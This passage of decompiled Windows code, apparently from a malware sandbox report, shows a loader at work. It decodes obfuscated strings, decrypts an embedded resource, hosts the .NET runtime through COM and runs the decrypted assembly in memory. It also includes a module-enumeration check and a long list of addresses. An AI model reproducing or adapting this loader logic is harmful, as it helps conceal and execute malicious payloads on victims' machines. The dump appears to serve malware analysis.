                                                						 *((char*)(_t557 + 0x2c)) = 0xb5;
                                                						 *((char*)(_t557 + 0x2d)) = 0x87;
                                                						 *((char*)(_t557 + 0x2e)) = 0x7b;
                                                						 *((char*)(_t557 + 0x2f)) = 0xf;
                                                						 *((char*)(_t557 + 0x30)) = 0xf4;
                                                						 *((char*)(_t557 + 0x31)) = 0x76;
                                                						 *((char*)(_t557 + 0x32)) = 0xb9;
                                                						 *((char*)(_t557 + 0x33)) = 0x34;
                                                						 *((char*)(_t557 + 0x34)) = 0xbf;
                                                						 *((char*)(_t557 + 0x35)) = 0x1e;
                                                						 *((char*)(_t557 + 0x36)) = 0xe7;
                                                						 *((char*)(_t557 + 0x37)) = 0x78;
                                                						 *((char*)(_t557 + 0x38)) = 0x98;
                                                						 *((char*)(_t557 + 0x39)) = 0xe9;
                                                						 *((char*)(_t557 + 0x3a)) = 0x6f;
                                                						 *((char*)(_t557 + 0x3b)) = 0xb4;
                                                						 *((char*)(_t557 + 0x3c)) = 0;
                                                						_t344 = E00401650(_t557 + 0x18, _t557 + 0x158);
                                                						_t558 = _t557 + 8;
                                                						_t536 = FindResourceA(_t526, _t344, 0xa);
                                                						 *(_t558 + 0x50) = _t536;
                                                						_t551 = LoadResource(_t526, _t536);
                                                						 *((intOrPtr*)(_t558 + 0x44)) = LockResource(_t551);
                                                						_t349 = E0040B84D(0, _t557 + 0x18, _t526, SizeofResource(_t526, _t536)); // executed
                                                						_push(0x40022);
                                                						_t537 = _t349; // executed
                                                						_t350 = E0040AF66(0, _t526, __eflags); // executed
                                                						_t559 = _t558 + 8;
                                                						 *(_t559 + 0x34) = _t350;
                                                						__eflags = _t350;
                                                						if(_t350 == 0) {
                                                							 *(_t559 + 0x50) = 0;
                                                						} else {
                                                							E0040BA30(_t526, _t350, 0, 0x40022);
                                                							_t486 =  *(_t559 + 0x40);
                                                							_t559 = _t559 + 0xc;
                                                							 *(_t559 + 0x50) = _t486;
                                                						}
                                                						E00401300( *(_t559 + 0x50));
                                                						_t497 =  *(_t559 + 0x48);
                                                						_t352 = SizeofResource(_t526, _t497);
                                                						 *(_t559 + 0x40) = _t352;
                                                						asm("cdq");
                                                						_t354 = _t352 + (_t497 & 0x000003ff) >> 0xa;
                                                						__eflags = _t354;
                                                						if(_t354 > 0) {
                                                							_t519 =  *(_t559 + 0x3c);
                                                							_t482 = _t537 - _t519;
                                                							__eflags = _t482;
                                                							 *(_t559 + 0x34) = _t519;
                                                							 *(_t559 + 0x88) = _t482;
                                                							 *(_t559 + 0x38) = _t354;
                                                							do {
                                                								_t424 =  *(_t559 + 0x34);
                                                								_push( *(_t559 + 0x88) + _t424);
                                                								_push(0x400);
                                                								_push(_t424);
                                                								E00401560(0,  *((intOrPtr*)(_t559 + 0x54)));
                                                								 *(_t559 + 0x34) =  *(_t559 + 0x34) + 0x400;
                                                								_t179 = _t559 + 0x38;
                                                								 *_t179 =  *(_t559 + 0x38) - 1;
                                                								__eflags =  *_t179;
                                                							} while ( *_t179 != 0);
                                                						}
                                                						_t448 =  *(_t559 + 0x40) & 0x800003ff;
                                                						__eflags = _t448;
                                                						if(_t448 < 0) {
                                                							_t448 = (_t448 - 0x00000001 | 0xfffffc00) + 1;
                                                							__eflags = _t448;
                                                						}
                                                						__eflags = _t448;
                                                						if(_t448 > 0) {
                                                							_t421 =  *(_t559 + 0x40) - _t448;
                                                							_push(_t421 + _t537);
                                                							_push(_t448);
                                                							_t422 = _t421 +  *((intOrPtr*)(_t559 + 0x44));
                                                							__eflags = _t422;
                                                							_push(_t422);
                                                							E00401560(0,  *((intOrPtr*)(_t559 + 0x58)));
                                                						}
                                                						E0040BA30(_t526,  *(_t559 + 0x3c), 0,  *(_t559 + 0x40));
                                                						_t560 = _t559 + 0xc;
                                                						FreeResource(_t551);
                                                						_t552 =  *_t537;
                                                						 *((intOrPtr*)(_t560 + 0x94)) = _t552;
                                                						_t358 = E0040B84D(0,  *(_t559 + 0x40), _t526, _t552); // executed
                                                						_t561 = _t560 + 4;
                                                						 *((intOrPtr*)(_t561 + 0x40)) = _t358;
                                                						_t359 = SizeofResource(_t526,  *(_t560 + 0x4c));
                                                						_t527 =  *((intOrPtr*)(_t561 + 0x38));
                                                						_t192 = _t537 + 4; // 0x4
                                                						E0040AC60(_t527, _t561 + 0x98, _t192, _t359);
                                                						E0040BA30(_t527, _t537, 0,  *((intOrPtr*)(_t561 + 0x50)));
                                                						_t528 = _t527 + 0xe;
                                                						 *((char*)(_t561 + 0x34)) = 0xce;
                                                						 *((char*)(_t561 + 0x35)) = 0x27;
                                                						 *((char*)(_t561 + 0x36)) = 0x9c;
                                                						 *((char*)(_t561 + 0x37)) = 0x1a;
                                                						 *((char*)(_t561 + 0x38)) = 0x95;
                                                						 *((char*)(_t561 + 0x39)) = 0x21;
                                                						 *((char*)(_t561 + 0x3a)) = 0x2e;
                                                						 *((char*)(_t561 + 0x3b)) = 0xd;
                                                						 *((char*)(_t561 + 0x3c)) = 0xdb;
                                                						 *((char*)(_t561 + 0x3d)) = 0x29;
                                                						 *((char*)(_t561 + 0x3e)) = 0x57;
                                                						 *((char*)(_t561 + 0x3f)) = 0x56;
                                                						 *((char*)(_t561 + 0x40)) = 0xf8;
                                                						 *((char*)(_t561 + 0x41)) = 0x98;
                                                						 *((char*)(_t561 + 0x42)) = 0x5b;
                                                						 *((char*)(_t561 + 0x43)) = 0xf4;
                                                						 *((char*)(_t561 + 0x44)) = 0xb5;
                                                						 *((char*)(_t561 + 0x45)) = 0x87;
                                                						 *((char*)(_t561 + 0x46)) = 0x7b;
                                                						 *((char*)(_t561 + 0x47)) = 0xf;
                                                						 *((char*)(_t561 + 0x48)) = 0xf4;
                                                						 *((char*)(_t561 + 0x49)) = 0x76;
                                                						 *((char*)(_t561 + 0x4a)) = 0xb9;
                                                						 *((char*)(_t561 + 0x4b)) = 0x34;
                                                						 *((char*)(_t561 + 0x4c)) = 0xbf;
                                                						 *((char*)(_t561 + 0x4d)) = 0x1e;
                                                						 *((char*)(_t561 + 0x4e)) = 0xe7;
                                                						 *((char*)(_t561 + 0x4f)) = 0x78;
                                                						 *((char*)(_t561 + 0x50)) = 0x98;
                                                						 *((char*)(_t561 + 0x51)) = 0xe9;
                                                						 *((char*)(_t561 + 0x52)) = 0x6f;
                                                						 *((char*)(_t561 + 0x53)) = 0xb4;
                                                						 *((char*)(_t561 + 0x54)) = 0;
                                                						_t364 = E00401650(_t561 + 0x30, _t561 + 0x110);
                                                						_t562 = _t561 + 0x24;
                                                						_t365 = LoadLibraryA(_t364); // executed
                                                						_t538 = _t365;
                                                						 *((char*)(_t562 + 0x10)) = 0xe0;
                                                						 *((char*)(_t562 + 0x11)) = 0x18;
                                                						 *((char*)(_t562 + 0x12)) = 0xad;
                                                						 *((char*)(_t562 + 0x13)) = 0x36;
                                                						 *((char*)(_t562 + 0x14)) = 0x95;
                                                						 *((char*)(_t562 + 0x15)) = 0x21;
                                                						_t451 = _t562 + 0x134;
                                                						 *((char*)(_t562 + 0x1e)) = 0x2a;
                                                						 *((char*)(_t562 + 0x1f)) = 0x57;
                                                						 *((char*)(_t562 + 0x20)) = 0xda;
                                                						 *((char*)(_t562 + 0x21)) = 0xc;
                                                						 *((char*)(_t562 + 0x22)) = 0x55;
                                                						 *((char*)(_t562 + 0x23)) = 0x25;
                                                						 *((char*)(_t562 + 0x24)) = 0x8c;
                                                						 *((char*)(_t562 + 0x25)) = 0xf9;
                                                						 *((char*)(_t562 + 0x26)) = 0x35;
                                                						 *((char*)(_t562 + 0x27)) = 0x97;
                                                						 *((char*)(_t562 + 0x28)) = 0xd0;
                                                						 *((char*)(_t562 + 0x29)) = 0x87;
                                                						 *((char*)(_t562 + 0x2a)) = 0x7b;
                                                						 *((char*)(_t562 + 0x2b)) = 0xf;
                                                						 *((char*)(_t562 + 0x2c)) = 0xf4;
                                                						 *((char*)(_t562 + 0x2d)) = 0x76;
                                                						 *((char*)(_t562 + 0x2e)) = 0xb9;
                                                						 *((char*)(_t562 + 0x2f)) = 0x34;
                                                						 *((char*)(_t562 + 0x30)) = 0xbf;
                                                						 *((char*)(_t562 + 0x31)) = 0x1e;
                                                						 *((char*)(_t562 + 0x32)) = 0xe7;
                                                						 *((char*)(_t562 + 0x33)) = 0x78;
                                                						 *((char*)(_t562 + 0x34)) = 0x98;
                                                						 *((char*)(_t562 + 0x35)) = 0xe9;
                                                						 *((char*)(_t562 + 0x36)) = 0x6f;
                                                						 *((char*)(_t562 + 0x37)) = 0xb4;
                                                						 *((char*)(_t562 + 0x38)) = 0;
                                                						_t366 = E00401650(_t562 + 0x14, _t451);
                                                						_t563 = _t562 + 8;
                                                						_t367 = GetProcAddress(_t365, _t366);
                                                						__eflags = _t367;
                                                						_t452 = _t451 & 0xffffff00 | _t367 != 0x00000000;
                                                						__eflags = _t452;
                                                						 *(_t563 + 0x47) = _t452 == 0;
                                                						 *0x423480 = _t367;
                                                						 *((intOrPtr*)(_t563 + 0x80)) = 0;
                                                						 *((intOrPtr*)(_t563 + 0x84)) = 0;
                                                						 *((intOrPtr*)(_t563 + 0x4c)) = 0;
                                                						 *(_t563 + 0x58) = 0;
                                                						 *(_t563 + 0x54) = 0;
                                                						__eflags = _t452;
                                                						if(_t452 != 0) {
                                                							_t368 =  *_t367(0x41b230, 0x41b220, _t563 + 0x80); // executed
                                                							__eflags = _t368;
                                                							if(_t368 >= 0) {
                                                								__eflags =  *(_t563 + 0x47);
                                                								if( *(_t563 + 0x47) == 0) {
                                                									 *((intOrPtr*)(_t563 + 0x17c)) = _t563 + 0x17c;
                                                									E004018F0( *((intOrPtr*)(_t563 + 0x38)), _t563 + 0x17c, _t563 + 0x17c,  *((intOrPtr*)(_t563 + 0x38)), 3);
                                                									_t376 =  *((intOrPtr*)(_t563 + 0x80));
                                                									_t378 =  *((intOrPtr*)( *((intOrPtr*)( *_t376 + 0xc))))(_t376,  *((intOrPtr*)(_t563 + 0x178)), 0x41b240, _t563 + 0x84); // executed
                                                									__eflags = _t378;
                                                									if(_t378 >= 0) {
                                                										_t381 =  *((intOrPtr*)(_t563 + 0x84));
                                                										_t383 =  *((intOrPtr*)( *((intOrPtr*)( *_t381 + 0x24))))(_t381, 0x41b210, 0x41b290, _t563 + 0x4c); // executed
                                                										__eflags = _t383;
                                                										if(_t383 >= 0) {
                                                											_t384 =  *((intOrPtr*)(_t563 + 0x4c));
                                                											_t385 =  *((intOrPtr*)( *((intOrPtr*)( *_t384 + 0x28))))(_t384); // executed
                                                											__eflags = _t385;
                                                											if(_t385 >= 0) {
                                                												 *((intOrPtr*)(_t563 + 0x38)) = 0;
                                                												E00401870(_t563 + 0x44, _t552, "_._");
                                                												_t539 = __imp__#8;
                                                												 *((intOrPtr*)(_t563 + 0x40)) = 0;
                                                												 *_t539(_t563 + 0x94);
                                                												E00401870(_t563 + 0x3c, _t552, "___");
                                                												 *_t539(_t563 + 0xa4);
                                                												 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t563 + 0x4c)))) + 0x34))))( *((intOrPtr*)(_t563 + 0x50)), E004018D0(_t563 + 0x58)); // executed
                                                												_t542 =  *(_t563 + 0x58);
                                                												__eflags = _t542;
                                                												if(_t542 == 0) {
                                                													E0040AD90(0x80004003);
                                                												}
                                                												_t396 =  *((intOrPtr*)( *((intOrPtr*)( *_t542))))(_t542, 0x41b270, E004018D0(_t563 + 0x54));
                                                												 *((intOrPtr*)(_t563 + 0x94)) = _t552 + 0xfffffff2;
                                                												 *((intOrPtr*)(_t563 + 0x98)) = 0;
                                                												__imp__#15(0x11, 1, _t563 + 0x88); // executed
                                                												_t543 = _t396;
                                                												 *((intOrPtr*)(_t563 + 0x50)) = 0;
                                                												__imp__#23(_t543, _t563 + 0x48);
                                                												E0040B350(0, _t528, _t543,  *((intOrPtr*)(_t563 + 0x48)), _t528, _t552 + 0xfffffff2);
                                                												_t564 = _t563 + 0xc;
                                                												__imp__#24(_t543);
                                                												_t399 =  *(_t564 + 0x54);
                                                												__eflags = _t399;
                                                												if(_t399 == 0) {
                                                													_t399 = E0040AD90(0x80004003);
                                                												}
                                                												 *((intOrPtr*)( *((intOrPtr*)( *_t399 + 0xb4))))(_t399, _t543, E004018D0(_t564 + 0x34)); // executed
                                                												__eflags = _t543;
                                                												if(_t543 != 0) {
                                                													__imp__#16(_t543); // executed
                                                												}
                                                												_t402 =  *(_t564 + 0x34);
                                                												__eflags = _t402;
                                                												if(_t402 == 0) {
                                                													_t402 = E0040AD90(0x80004003);
                                                												}
                                                												_t469 =  *(_t564 + 0x40);
                                                												_t555 = _t402;
                                                												__eflags = _t469;
                                                												if(_t469 == 0) {
                                                													_t531 = 0;
                                                													__eflags = 0;
                                                												} else {
                                                													_t531 =  *_t469;
                                                												}
                                                												 *((intOrPtr*)( *((intOrPtr*)( *_t402 + 0x44))))(_t555, _t531, E004018D0(_t564 + 0x3c)); // executed
                                                												__imp__#411(0xc, 0, 0);
                                                												_t471 =  *(_t564 + 0x3c);
                                                												__eflags = _t471;
                                                												if(_t471 == 0) {
                                                													E0040AD90(0x80004003);
                                                												}
                                                												_t405 =  *(_t564 + 0x38);
                                                												__eflags = _t405;
                                                												if(_t405 == 0) {
                                                													_t514 = 0;
                                                													__eflags = 0;
                                                												} else {
                                                													_t514 =  *_t405;
                                                												}
                                                												_t563 = _t564 - 0x10;
                                                												_t407 = _t563;
                                                												 *_t407 =  *((intOrPtr*)(_t564 + 0x94));
                                                												 *((intOrPtr*)(_t407 + 4)) =  *((intOrPtr*)(_t563 + 0xb0));
                                                												 *((intOrPtr*)(_t407 + 8)) =  *((intOrPtr*)(_t563 + 0xb8));
                                                												_t528 =  *((intOrPtr*)(_t563 + 0xc0));
                                                												 *((intOrPtr*)(_t407 + 0xc)) =  *((intOrPtr*)(_t563 + 0xc0));
                                                												 *((intOrPtr*)( *((intOrPtr*)( *_t471 + 0xe4))))(_t471, _t514, 0x118, 0, 0, _t564 + 0xa4);
                                                												_t538 = __imp__#9; // 0x74f3cf00
                                                												_t538->i(_t563 + 0xa4);
                                                												E004019A0(_t563 + 0x38);
                                                												_t538->i(_t563 + 0x94);
                                                												_t413 =  *(_t563 + 0x3c);
                                                												__eflags = _t413;
                                                												if(_t413 != 0) {
                                                													 *((intOrPtr*)( *((intOrPtr*)( *_t413 + 8))))(_t413);
                                                												}
                                                												E004019A0(_t563 + 0x40);
                                                												_t415 =  *(_t563 + 0x34);
                                                												__eflags = _t415;
                                                												if(_t415 != 0) {
                                                													 *((intOrPtr*)( *((intOrPtr*)( *_t415 + 8))))(_t415);
                                                												}
                                                											}
                                                										}
                                                									}
                                                									_t379 =  *((intOrPtr*)(_t563 + 0x174));
                                                									__eflags = _t379 - _t563 + 0x178;
                                                									if(__eflags != 0) {
                                                										_push(_t379);
                                                										E0040B6B5(0, _t528, _t538, __eflags);
                                                										_t563 = _t563 + 4;
                                                									}
                                                								}
                                                							}
                                                							_t369 =  *(_t563 + 0x54);
                                                							__eflags = _t369;
                                                							if(_t369 != 0) {
                                                								 *((intOrPtr*)( *((intOrPtr*)( *_t369 + 8))))(_t369);
                                                							}
                                                							_t370 =  *(_t563 + 0x58);
                                                							__eflags = _t370;
                                                							if(_t370 != 0) {
                                                								 *((intOrPtr*)( *((intOrPtr*)( *_t370 + 8))))(_t370);
                                                							}
                                                						}
                                                						goto L80;
                                                					} else {
                                                						_t428 = E00401650(_t557 + 0x60, _t557 + 0xd4);
                                                						_t565 = _t557 + 8;
                                                						_t547 = _t428;
                                                						_t520 = _t565 + 0x298;
                                                						while(1) {
                                                							_t429 =  *_t520;
                                                							if(_t429 !=  *_t547) {
                                                								break;
                                                							}
                                                							if(_t429 == 0) {
                                                								L7:
                                                								_t429 = 0;
                                                							} else {
                                                								_t493 =  *((intOrPtr*)(_t520 + 1));
                                                								if(_t493 !=  *((intOrPtr*)(_t547 + 1))) {
                                                									break;
                                                								} else {
                                                									_t520 = _t520 + 2;
                                                									_t547 = _t547 + 2;
                                                									if(_t493 != 0) {
                                                										continue;
                                                									} else {
                                                										goto L7;
                                                									}
                                                								}
                                                							}
                                                							L9:
                                                							if(_t429 != 0) {
                                                								_t431 = E00401650(_t565 + 0x14, _t565 + 0xb4);
                                                								_t557 = _t565 + 8;
                                                								_t548 = _t431;
                                                								_t488 = _t557 + 0x298;
                                                								while(1) {
                                                									_t432 =  *_t488;
                                                									__eflags = _t432 -  *_t548;
                                                									if(_t432 !=  *_t548) {
                                                										break;
                                                									}
                                                									__eflags = _t432;
                                                									if(_t432 == 0) {
                                                										L16:
                                                										_t432 = 0;
                                                									} else {
                                                										_t432 =  *((intOrPtr*)(_t488 + 1));
                                                										__eflags = _t432 -  *((intOrPtr*)(_t548 + 1));
                                                										if(_t432 !=  *((intOrPtr*)(_t548 + 1))) {
                                                											break;
                                                										} else {
                                                											_t488 = _t488 + 2;
                                                											_t548 = _t548 + 2;
                                                											__eflags = _t432;
                                                											if(_t432 != 0) {
                                                												continue;
                                                											} else {
                                                												goto L16;
                                                											}
                                                										}
                                                									}
                                                									L18:
                                                									__eflags = _t432;
                                                									if(_t432 == 0) {
                                                										goto L10;
                                                									} else {
                                                										_t435 = Module32Next(_t525, _t557 + 0x278);
                                                										__eflags = _t435;
                                                										if(_t435 != 0) {
                                                											do {
                                                												_t437 = E00401650(_t557 + 0x60, _t557 + 0xd4);
                                                												_t566 = _t557 + 8;
                                                												_t549 = _t437;
                                                												_t490 = _t566 + 0x298;
                                                												while(1) {
                                                													_t438 =  *_t490;
                                                													__eflags = _t438 -  *_t549;
                                                													if(_t438 !=  *_t549) {
                                                														break;
                                                													}
                                                													__eflags = _t438;
                                                													if(_t438 == 0) {
                                                														L26:
                                                														_t438 = 0;
                                                													} else {
                                                														_t438 =  *((intOrPtr*)(_t490 + 1));
                                                														__eflags = _t438 -  *((intOrPtr*)(_t549 + 1));
                                                														if(_t438 !=  *((intOrPtr*)(_t549 + 1))) {
                                                															break;
                                                														} else {
                                                															_t490 = _t490 + 2;
                                                															_t549 = _t549 + 2;
                                                															__eflags = _t438;
                                                															if(_t438 != 0) {
                                                																continue;
                                                															} else {
                                                																goto L26;
                                                															}
                                                														}
                                                													}
                                                													L28:
                                                													__eflags = _t438;
                                                													if(_t438 == 0) {
                                                														goto L10;
                                                													} else {
                                                														_t439 = E00401650(_t566 + 0x14, _t566 + 0xb4);
                                                														_t557 = _t566 + 8;
                                                														_t550 = _t439;
                                                														_t492 = _t557 + 0x298;
                                                														while(1) {
                                                															_t440 =  *_t492;
                                                															__eflags = _t440 -  *_t550;
                                                															if(_t440 !=  *_t550) {
                                                																break;
                                                															}
                                                															__eflags = _t440;
                                                															if(_t440 == 0) {
                                                																L34:
                                                																_t440 = 0;
                                                															} else {
                                                																_t440 =  *((intOrPtr*)(_t492 + 1));
                                                																__eflags = _t440 -  *((intOrPtr*)(_t550 + 1));
                                                																if(_t440 !=  *((intOrPtr*)(_t550 + 1))) {
                                                																	break;
                                                																} else {
                                                																	_t492 = _t492 + 2;
                                                																	_t550 = _t550 + 2;
                                                																	__eflags = _t440;
                                                																	if(_t440 != 0) {
                                                																		continue;
                                                																	} else {
                                                																		goto L34;
                                                																	}
                                                																}
                                                															}
                                                															L36:
                                                															__eflags = _t440;
                                                															if(_t440 == 0) {
                                                																goto L10;
                                                															} else {
                                                																goto L37;
                                                															}
                                                															goto L81;
                                                														}
                                                														asm("sbb eax, eax");
                                                														asm("sbb eax, 0xffffffff");
                                                														goto L36;
                                                													}
                                                													goto L81;
                                                												}
                                                												asm("sbb eax, eax");
                                                												asm("sbb eax, 0xffffffff");
                                                												goto L28;
                                                												L37:
                                                												_t442 = Module32Next(_t525, _t557 + 0x278);
                                                												__eflags = _t442;
                                                											} while (_t442 != 0);
                                                										}
                                                										goto L38;
                                                									}
                                                									goto L81;
                                                								}
                                                								asm("sbb eax, eax");
                                                								asm("sbb eax, 0xffffffff");
                                                								goto L18;
                                                							} else {
                                                								L10:
                                                								CloseHandle(_t525);
                                                								return 0;
                                                							}
                                                							goto L81;
                                                						}
                                                						asm("sbb eax, eax");
                                                						asm("sbb eax, 0xffffffff");
                                                						goto L9;
                                                					}
                                                				}
                                                				L81:
                                                			}

































































































                                                0x004019f0
                                                0x004019f0
                                                0x004019fd
                                                0x00401a10
                                                0x00401a15
                                                0x00401a1a
                                                0x00401a1f
                                                0x00401a24
                                                0x00401a29
                                                0x00401a2e
                                                0x00401a33
                                                0x00401a38
                                                0x00401a3d
                                                0x00401a42
                                                0x00401a47
                                                0x00401a4c
                                                0x00401a51
                                                0x00401a56
                                                0x00401a5b
                                                0x00401a60
                                                0x00401a65
                                                0x00401a6a
                                                0x00401a6f
                                                0x00401a74
                                                0x00401a79
                                                0x00401a7e
                                                0x00401a83
                                                0x00401a88
                                                0x00401a8d
                                                0x00401a92
                                                0x00401a97
                                                0x00401a9c
                                                0x00401aa1
                                                0x00401aa6
                                                0x00401aab
                                                0x00401ab0
                                                0x00401ab9
                                                0x00401aba
                                                0x00401abf
                                                0x00401ac7
                                                0x0040248d
                                                0x0040248d
                                                0x00402496
                                                0x00401acd
                                                0x00401ad6
                                                0x00401ae2
                                                0x00401ae6
                                                0x00401af1
                                                0x00401af6
                                                0x00401afb
                                                0x00401b00
                                                0x00401b05
                                                0x00401b0a
                                                0x00401b0f
                                                0x00401b14
                                                0x00401b19
                                                0x00401b1e
                                                0x00401b23
                                                0x00401b28
                                                0x00401b2d
                                                0x00401b32
                                                0x00401b37
                                                0x00401b3c
                                                0x00401b41
                                                0x00401b46
                                                0x00401b4b
                                                0x00401b50
                                                0x00401b55
                                                0x00401b5a
                                                0x00401b5f
                                                0x00401b64
                                                0x00401b69
                                                0x00401b6e
                                                0x00401b73
                                                0x00401b78
                                                0x00401b7d
                                                0x00401b85
                                                0x00401b8d
                                                0x00401b95
                                                0x00401b9d
                                                0x00401ba4
                                                0x00401ba9
                                                0x00401bae
                                                0x00401bb3
                                                0x00401bb8
                                                0x00401bbd
                                                0x00401bc2
                                                0x00401bc7
                                                0x00401bcc
                                                0x00401bd1
                                                0x00401bd6
                                                0x00401bdb
                                                0x00401be0
                                                0x00401be5
                                                0x00401bea
                                                0x00401bef
                                                0x00401bf4
                                                0x00401bf9
                                                0x00401bfe
                                                0x00401c03
                                                0x00401c08
                                                0x00401c0d
                                                0x00401c12
                                                0x00401c17
                                                0x00401c1c
                                                0x00401c21
                                                0x00401c26
                                                0x00401c2b
                                                0x00401c30
                                                0x00401c35
                                                0x00401c3a
                                                0x00401c3f
                                                0x00401c44
                                                0x00401c48
                                                0x00401c4f
                                                0x00401dc3
                                                0x00401dc4
                                                0x00401de0
                                                0x00401de2
                                                0x00401de7
                                                0x00401dec
                                                0x00401df1
                                                0x00401df6
                                                0x00401dfb
                                                0x00401e00
                                                0x00401e05
                                                0x00401e0a
                                                0x00401e0f
                                                0x00401e14
                                                0x00401e19
                                                0x00401e1e
                                                0x00401e23
                                                0x00401e28
                                                0x00401e2d
                                                0x00401e32
                                                0x00401e37
                                                0x00401e3c
                                                0x00401e41
                                                0x00401e46
                                                0x00401e4b
                                                0x00401e50
                                                0x00401e55
                                                0x00401e5a
                                                0x00401e5f
                                                0x00401e64
                                                0x00401e69
                                                0x00401e6e
                                                0x00401e73
                                                0x00401e78
                                                0x00401e7d
                                                0x00401e82
                                                0x00401e86
                                                0x00401e8b
                                                0x00401e96
                                                0x00401e9a
                                                0x00401ea4
                                                0x00401eaf
                                                0x00401eba
                                                0x00401ebf
                                                0x00401ec4
                                                0x00401ec6
                                                0x00401ecb
                                                0x00401ece
                                                0x00401ed2
                                                0x00401ed4
                                                0x00401eef
                                                0x00401ed6
                                                0x00401edd
                                                0x00401ee2
                                                0x00401ee6
                                                0x00401ee9
                                                0x00401ee9
                                                0x00401ef7
                                                0x00401efc
                                                0x00401f02
                                                0x00401f08
                                                0x00401f0c
                                                0x00401f15
                                                0x00401f18
                                                0x00401f1a
                                                0x00401f1c
                                                0x00401f22
                                                0x00401f22
                                                0x00401f24
                                                0x00401f28
                                                0x00401f2f
                                                0x00401f33
                                                0x00401f33
                                                0x00401f40
                                                0x00401f45
                                                0x00401f4a
                                                0x00401f4b
                                                0x00401f50
                                                0x00401f58
                                                0x00401f58
                                                0x00401f58
                                                0x00401f58
                                                0x00401f33
                                                0x00401f63
                                                0x00401f63
                                                0x00401f69
                                                0x00401f72
                                                0x00401f72
                                                0x00401f72
                                                0x00401f73
                                                0x00401f75
                                                0x00401f7b
                                                0x00401f80
                                                0x00401f81
                                                0x00401f86
                                                0x00401f86
                                                0x00401f8c
                                                0x00401f8d
                                                0x00401f8d
                                                0x00401f9d
                                                0x00401fa2
                                                0x00401fa6
                                                0x00401fac
                                                0x00401faf
                                                0x00401fb6
                                                0x00401fbf
                                                0x00401fc4
                                                0x00401fc8
                                                0x00401fce
                                                0x00401fd3
                                                0x00401fe0
                                                0x00401fec
                                                0x00401ffe
                                                0x00402001
                                                0x00402006
                                                0x0040200b
                                                0x00402010
                                                0x00402015
                                                0x0040201a
                                                0x0040201f
                                                0x00402024
                                                0x00402029
                                                0x0040202e
                                                0x00402033
                                                0x00402038
                                                0x0040203d
                                                0x00402042
                                                0x00402047
                                                0x0040204c
                                                0x00402051
                                                0x00402056
                                                0x0040205b
                                                0x00402060
                                                0x00402065
                                                0x0040206a
                                                0x0040206f
                                                0x00402074
                                                0x00402079
                                                0x0040207e
                                                0x00402083
                                                0x00402088
                                                0x0040208d
                                                0x00402092
                                                0x00402097
                                                0x0040209c
                                                0x004020a1
                                                0x004020a5
                                                0x004020aa
                                                0x004020ae
                                                0x004020b4
                                                0x004020b6
                                                0x004020bb
                                                0x004020c0
                                                0x004020c5
                                                0x004020ca
                                                0x004020cf
                                                0x004020d4
                                                0x004020e1
                                                0x004020e6
                                                0x004020eb
                                                0x004020f0
                                                0x004020f5
                                                0x004020fa
                                                0x004020ff
                                                0x00402104
                                                0x00402109
                                                0x0040210e
                                                0x00402113
                                                0x00402118
                                                0x0040211d
                                                0x00402122
                                                0x00402127
                                                0x0040212c
                                                0x00402131
                                                0x00402136
                                                0x0040213b
                                                0x00402140
                                                0x00402145
                                                0x0040214a
                                                0x0040214f
                                                0x00402154
                                                0x00402159
                                                0x0040215e
                                                0x00402163
                                                0x00402167
                                                0x0040216c
                                                0x00402171
                                                0x00402177
                                                0x00402179
                                                0x0040217c
                                                0x0040217e
                                                0x00402183
                                                0x00402188
                                                0x0040218f
                                                0x00402196
                                                0x0040219a
                                                0x0040219e
                                                0x004021a2
                                                0x004021a4
                                                0x004021bc
                                                0x004021be
                                                0x004021c0
                                                0x004021c6
                                                0x004021ca
                                                0x004021e5
                                                0x004021ec
                                                0x004021f1
                                                0x00402213
                                                0x00402215
                                                0x00402217
                                                0x0040221d
                                                0x00402239
                                                0x0040223b
                                                0x0040223d
                                                0x00402243
                                                0x0040224d
                                                0x0040224f
                                                0x00402251
                                                0x00402260
                                                0x00402264
                                                0x00402269
                                                0x00402277
                                                0x0040227b
                                                0x00402286
                                                0x00402293
                                                0x004022af
                                                0x004022b1
                                                0x004022b5
                                                0x004022b7
                                                0x004022be
                                                0x004022be
                                                0x004022d7
                                                0x004022e8
                                                0x004022ef
                                                0x004022f6
                                                0x00402300
                                                0x00402304
                                                0x00402308
                                                0x00402315
                                                0x0040231a
                                                0x0040231e
                                                0x00402324
                                                0x00402328
                                                0x0040232a
                                                0x00402331
                                                0x00402331
                                                0x0040234e
                                                0x00402350
                                                0x00402352
                                                0x00402355
                                                0x00402355
                                                0x0040235b
                                                0x0040235f
                                                0x00402361
                                                0x00402368
                                                0x00402368
                                                0x0040236d
                                                0x00402371
                                                0x00402373
                                                0x00402375
                                                0x0040237b
                                                0x0040237b
                                                0x00402377
                                                0x00402377
                                                0x00402377
                                                0x00402390
                                                0x00402396
                                                0x0040239c
                                                0x004023a0
                                                0x004023a2
                                                0x004023a9
                                                0x004023a9
                                                0x004023ae
                                                0x004023b2
                                                0x004023b4
                                                0x004023ba
                                                0x004023ba
                                                0x004023b6
                                                0x004023b6
                                                0x004023b6
                                                0x004023ce
                                                0x004023d1
                                                0x004023d3
                                                0x004023dd
                                                0x004023ec
                                                0x004023ef
                                                0x004023fe
                                                0x00402401
                                                0x00402403
                                                0x00402411
                                                0x00402417
                                                0x00402424
                                                0x00402426
                                                0x0040242a
                                                0x0040242c
                                                0x00402434
                                                0x00402434
                                                0x0040243a
                                                0x0040243f
                                                0x00402443
                                                0x00402445
                                                0x0040244d
                                                0x0040244d
                                                0x00402445
                                                0x00402251
                                                0x0040223d
                                                0x0040244f
                                                0x0040245d
                                                0x0040245f
                                                0x00402461
                                                0x00402462
                                                0x00402467
                                                0x00402467
                                                0x0040245f
                                                0x004021ca
                                                0x0040246a
                                                0x0040246e
                                                0x00402470
                                                0x00402478
                                                0x00402478
                                                0x0040247a
                                                0x0040247e
                                                0x00402480
                                                0x00402488
                                                0x00402488
                                                0x00402480
                                                0x00000000
                                                0x00401c55
                                                0x00401c62
                                                0x00401c67
                                                0x00401c6a
                                                0x00401c6c
                                                0x00401c73
                                                0x00401c73
                                                0x00401c77
                                                0x00000000
                                                0x00000000
                                                0x00401c7b
                                                0x00401c8f
                                                0x00401c8f
                                                0x00401c7d
                                                0x00401c7d
                                                0x00401c83
                                                0x00000000
                                                0x00401c85
                                                0x00401c85
                                                0x00401c88
                                                0x00401c8d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00401c8d
                                                0x00401c83
                                                0x00401c98
                                                0x00401c9a
                                                0x00401cbd
                                                0x00401cc2
                                                0x00401cc5
                                                0x00401cc7
                                                0x00401cd0
                                                0x00401cd0
